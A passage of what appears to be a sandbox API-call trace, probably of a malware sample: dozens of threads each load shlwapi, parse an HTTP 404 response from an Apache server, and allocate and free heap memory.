hHeap=0x690000) returned 1 [0330.025] GetProcessHeap () returned 0x690000 [0330.026] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b2fb8 | out: hHeap=0x690000) returned 1 Thread: id = 600 os_tid = 0x18e0 [0330.445] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0330.445] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:46:15 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0330.446] GetProcessHeap () returned 0x690000 [0330.446] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x10) returned 0x6ae958 [0330.446] GetProcessHeap () returned 0x690000 [0330.446] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ae958 | out: hHeap=0x690000) returned 1 [0330.446] GetProcessHeap () returned 0x690000 [0330.446] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b2fb8 | out: hHeap=0x690000) returned 1 Thread: id = 601 os_tid = 0x18e4 [0330.787] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0330.787] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:46:16 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0330.787] GetProcessHeap () returned 0x690000 [0330.787] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x10) returned 0x6ae958 [0330.787] GetProcessHeap () returned 0x690000 [0330.787] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ae958 | out: hHeap=0x690000) returned 1 [0330.787] GetProcessHeap () returned 0x690000 [0330.788] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b2fb8 | out: hHeap=0x690000) returned 1 Thread: id = 602 os_tid = 0x18e8 [0330.921] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0330.921] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:46:16 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0330.921] GetProcessHeap () returned 0x690000 [0330.921] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x10) returned 0x6aeb68 [0330.921] GetProcessHeap () returned 0x690000 [0330.922] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aeb68 | out: hHeap=0x690000) returned 1 [0330.922] GetProcessHeap () returned 0x690000 [0330.922] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b2fb8 | out: hHeap=0x690000) returned 1 Thread: id = 603 os_tid = 0x18ec [0331.219] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0331.220] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:46:16 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0331.220] GetProcessHeap () returned 0x690000 [0331.220] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x10) returned 0x6ae958 [0331.220] GetProcessHeap () returned 0x690000 [0331.220] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ae958 | out: hHeap=0x690000) returned 1 [0331.220] GetProcessHeap () returned 0x690000 [0331.221] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b2fb8 | out: hHeap=0x690000) returned 1 Thread: id = 604 os_tid = 0x18f0 [0331.414] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0331.414] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:46:16 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0331.414] GetProcessHeap () returned 0x690000 [0331.414] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x10) returned 0x6aeb68 [0331.414] GetProcessHeap () returned 0x690000 [0331.414] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aeb68 | out: hHeap=0x690000) returned 1 [0331.414] GetProcessHeap () returned 0x690000 [0331.415] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b2fb8 | out: hHeap=0x690000) returned 1 Thread: id = 605 os_tid = 0x18f4 [0331.623] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0331.624] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:46:16 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0331.624] GetProcessHeap () returned 0x690000 [0331.624] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x10) returned 0x6ae958 [0331.624] GetProcessHeap () returned 0x690000 [0331.624] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ae958 | out: hHeap=0x690000) returned 1 [0331.624] GetProcessHeap () returned 0x690000 [0331.625] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b2fb8 | out: hHeap=0x690000) returned 1 Thread: id = 606 os_tid = 0x18f8 [0331.869] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0331.870] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:46:17 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0331.870] GetProcessHeap () returned 0x690000 [0331.870] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x10) returned 0x6ae958 [0331.870] GetProcessHeap () returned 0x690000 [0331.870] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ae958 | out: hHeap=0x690000) returned 1 [0331.870] GetProcessHeap () returned 0x690000 [0331.870] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b2fb8 | out: hHeap=0x690000) returned 1 Thread: id = 607 os_tid = 0x18fc [0332.069] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0332.070] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:46:17 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0332.070] GetProcessHeap () returned 0x690000 [0332.070] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x10) returned 0x6aeb68 [0332.070] GetProcessHeap () returned 0x690000 [0332.070] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aeb68 | out: hHeap=0x690000) returned 1 [0332.070] GetProcessHeap () returned 0x690000 [0332.070] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b2fb8 | out: hHeap=0x690000) returned 1 Thread: id = 608 os_tid = 0x1900 [0332.763] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0332.764] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:46:17 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0332.764] GetProcessHeap () returned 0x690000 [0332.764] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x10) returned 0x6ae958 [0332.764] GetProcessHeap () returned 0x690000 [0332.764] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ae958 | out: hHeap=0x690000) returned 1 [0332.764] GetProcessHeap () returned 0x690000 [0332.764] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b2fb8 | out: hHeap=0x690000) returned 1 Thread: id = 609 os_tid = 0x1904 [0333.030] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0333.031] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:46:18 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0333.031] GetProcessHeap () returned 0x690000 [0333.031] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x10) returned 0x6ae958 [0333.031] GetProcessHeap () returned 0x690000 [0333.031] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ae958 | out: hHeap=0x690000) returned 1 [0333.031] GetProcessHeap () returned 0x690000 [0333.032] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b2fb8 | out: hHeap=0x690000) returned 1 Thread: id = 610 os_tid = 0x1908 [0333.252] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0333.255] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:46:18 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0333.255] GetProcessHeap () returned 0x690000 [0333.255] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x10) returned 0x6ae958 [0333.255] GetProcessHeap () returned 0x690000 [0333.255] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ae958 | out: hHeap=0x690000) returned 1 [0333.255] GetProcessHeap () returned 0x690000 [0333.256] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b2fb8 | out: hHeap=0x690000) returned 1 Thread: id = 611 os_tid = 0x190c [0333.503] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0333.506] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:46:18 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0333.506] GetProcessHeap () returned 0x690000 [0333.506] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x10) returned 0x6aeb68 [0333.506] GetProcessHeap () returned 0x690000 [0333.506] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aeb68 | out: hHeap=0x690000) returned 1 [0333.506] GetProcessHeap () returned 0x690000 [0333.507] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b2fb8 | out: hHeap=0x690000) returned 1 Thread: id = 612 os_tid = 0x1910 [0333.779] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0333.780] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:46:19 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0333.780] GetProcessHeap () returned 0x690000 [0333.780] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x10) returned 0x6ae958 [0333.780] GetProcessHeap () returned 0x690000 [0333.780] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ae958 | out: hHeap=0x690000) returned 1 [0333.780] GetProcessHeap () returned 0x690000 [0333.781] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b2fb8 | out: hHeap=0x690000) returned 1 Thread: id = 613 os_tid = 0x1914 [0333.974] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0333.975] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:46:19 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0333.975] GetProcessHeap () returned 0x690000 [0333.975] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x10) returned 0x6ae958 [0333.975] GetProcessHeap () returned 0x690000 [0333.975] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ae958 | out: hHeap=0x690000) returned 1 [0333.975] GetProcessHeap () returned 0x690000 [0333.975] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b2fb8 | out: hHeap=0x690000) returned 1 Thread: id = 614 os_tid = 0x1918 [0334.188] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0334.189] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:46:19 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0334.189] GetProcessHeap () returned 0x690000 [0334.189] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x10) returned 0x6ae958 [0334.189] GetProcessHeap () returned 0x690000 [0334.189] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ae958 | out: hHeap=0x690000) returned 1 [0334.189] GetProcessHeap () returned 0x690000 [0334.189] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b2fb8 | out: hHeap=0x690000) returned 1 Thread: id = 615 os_tid = 0x191c [0334.392] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0334.392] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:46:19 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0334.392] GetProcessHeap () returned 0x690000 [0334.392] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x10) returned 0x6aeb68 [0334.392] GetProcessHeap () returned 0x690000 [0334.392] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aeb68 | out: hHeap=0x690000) returned 1 [0334.392] GetProcessHeap () returned 0x690000 [0334.393] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b2fb8 | out: hHeap=0x690000) returned 1 Thread: id = 616 os_tid = 0x1920 [0334.721] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0334.721] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:46:19 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0334.721] GetProcessHeap () returned 0x690000 [0334.721] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x10) returned 0x6ae958 [0334.721] GetProcessHeap () returned 0x690000 [0334.722] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ae958 | out: hHeap=0x690000) returned 1 [0334.722] GetProcessHeap () returned 0x690000 [0334.722] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b2fb8 | out: hHeap=0x690000) returned 1 Thread: id = 617 os_tid = 0x1924 [0334.891] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0334.892] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:46:20 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0334.892] GetProcessHeap () returned 0x690000 [0334.892] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x10) returned 0x6aeb68 [0334.892] GetProcessHeap () returned 0x690000 [0334.892] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aeb68 | out: hHeap=0x690000) returned 1 [0334.892] GetProcessHeap () returned 0x690000 [0334.892] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b2fb8 | out: hHeap=0x690000) returned 1 Thread: id = 618 os_tid = 0x1928 [0335.073] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0335.074] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:46:20 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0335.074] GetProcessHeap () returned 0x690000 [0335.074] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x10) returned 0x6aeb68 [0335.074] GetProcessHeap () returned 0x690000 [0335.074] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aeb68 | out: hHeap=0x690000) returned 1 [0335.074] GetProcessHeap () returned 0x690000 [0335.074] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b2fb8 | out: hHeap=0x690000) returned 1 Thread: id = 619 os_tid = 0x1930 [0335.323] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0335.326] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:46:20 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0335.326] GetProcessHeap () returned 0x690000 [0335.326] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x10) returned 0x6ae958 [0335.326] GetProcessHeap () returned 0x690000 [0335.326] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ae958 | out: hHeap=0x690000) returned 1 [0335.326] GetProcessHeap () returned 0x690000 [0335.327] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b2fb8 | out: hHeap=0x690000) returned 1 Thread: id = 620 os_tid = 0x1934 [0335.493] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0335.494] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:46:20 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0335.494] GetProcessHeap () returned 0x690000 [0335.494] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x10) returned 0x6ae958 [0335.494] GetProcessHeap () returned 0x690000 [0335.494] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ae958 | out: hHeap=0x690000) returned 1 [0335.494] GetProcessHeap () returned 0x690000 [0335.494] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b2fb8 | out: hHeap=0x690000) returned 1 Thread: id = 621 os_tid = 0x193c [0335.710] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0335.711] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:46:20 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0335.711] GetProcessHeap () returned 0x690000 [0335.711] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x10) returned 0x6ae958 [0335.711] GetProcessHeap () returned 0x690000 [0335.711] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ae958 | out: hHeap=0x690000) returned 1 [0335.711] GetProcessHeap () returned 0x690000 [0335.711] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b2fb8 | out: hHeap=0x690000) returned 1 Thread: id = 622 os_tid = 0x1940 [0335.860] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0335.860] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:46:21 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0335.860] GetProcessHeap () returned 0x690000 [0335.860] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x10) returned 0x6aeb68 [0335.860] GetProcessHeap () returned 0x690000 [0335.861] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aeb68 | out: hHeap=0x690000) returned 1 [0335.861] GetProcessHeap () returned 0x690000 [0335.861] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b2fb8 | out: hHeap=0x690000) returned 1 Thread: id = 623 os_tid = 0x1944 [0336.061] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0336.062] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:46:21 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0336.062] GetProcessHeap () returned 0x690000 [0336.062] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x10) returned 0x6aeb68 [0336.062] GetProcessHeap () returned 0x690000 [0336.062] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aeb68 | out: hHeap=0x690000) returned 1 [0336.062] GetProcessHeap () returned 0x690000 [0336.062] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b2fb8 | out: hHeap=0x690000) returned 1 Thread: id = 624 os_tid = 0x1948 [0336.283] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0336.338] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:46:21 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0336.338] GetProcessHeap () returned 0x690000 [0336.338] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x10) returned 0x6ae958 [0336.338] GetProcessHeap () returned 0x690000 [0336.338] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ae958 | out: hHeap=0x690000) returned 1 [0336.338] GetProcessHeap () returned 0x690000 [0336.338] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b2fb8 | out: hHeap=0x690000) returned 1 Thread: id = 625 os_tid = 0x194c [0336.454] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0336.479] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:46:21 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0336.479] GetProcessHeap () returned 0x690000 [0336.479] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x10) returned 0x6ae958 [0336.479] GetProcessHeap () returned 0x690000 [0336.479] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ae958 | out: hHeap=0x690000) returned 1 [0336.480] GetProcessHeap () returned 0x690000 [0336.480] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b2fb8 | out: hHeap=0x690000) returned 1 Thread: id = 626 os_tid = 0x1950 [0336.679] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0336.679] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:46:21 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0336.679] GetProcessHeap () returned 0x690000 [0336.679] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x10) returned 0x6ae958 [0336.680] GetProcessHeap () returned 0x690000 [0336.680] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ae958 | out: hHeap=0x690000) returned 1 [0336.680] GetProcessHeap () returned 0x690000 [0336.680] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b2fb8 | out: hHeap=0x690000) returned 1 Thread: id = 627 os_tid = 0x1954 [0336.881] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0336.881] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:46:22 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0336.881] GetProcessHeap () returned 0x690000 [0336.882] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x10) returned 0x6ae958 [0336.882] GetProcessHeap () returned 0x690000 [0336.882] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ae958 | out: hHeap=0x690000) returned 1 [0336.882] GetProcessHeap () returned 0x690000 [0336.882] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b2fb8 | out: hHeap=0x690000) returned 1 Thread: id = 628 os_tid = 0x1958 [0337.067] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0337.068] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:46:22 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0337.068] GetProcessHeap () returned 0x690000 [0337.068] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x10) returned 0x6aeb68 [0337.068] GetProcessHeap () returned 0x690000 [0337.068] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aeb68 | out: hHeap=0x690000) returned 1 [0337.068] GetProcessHeap () returned 0x690000 [0337.069] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b2fb8 | out: hHeap=0x690000) returned 1 Thread: id = 629 os_tid = 0x195c [0337.338] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0337.339] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:46:22 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0337.339] GetProcessHeap () returned 0x690000 [0337.339] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x10) returned 0x6ae958 [0337.339] GetProcessHeap () returned 0x690000 [0337.339] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ae958 | out: hHeap=0x690000) returned 1 [0337.339] GetProcessHeap () returned 0x690000 [0337.339] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b2fb8 | out: hHeap=0x690000) returned 1 Thread: id = 630 os_tid = 0x1960 [0337.640] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0337.641] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:46:22 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0337.641] GetProcessHeap () returned 0x690000 [0337.641] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x10) returned 0x6ae958 [0337.641] GetProcessHeap () returned 0x690000 [0337.641] HeapFree (in: 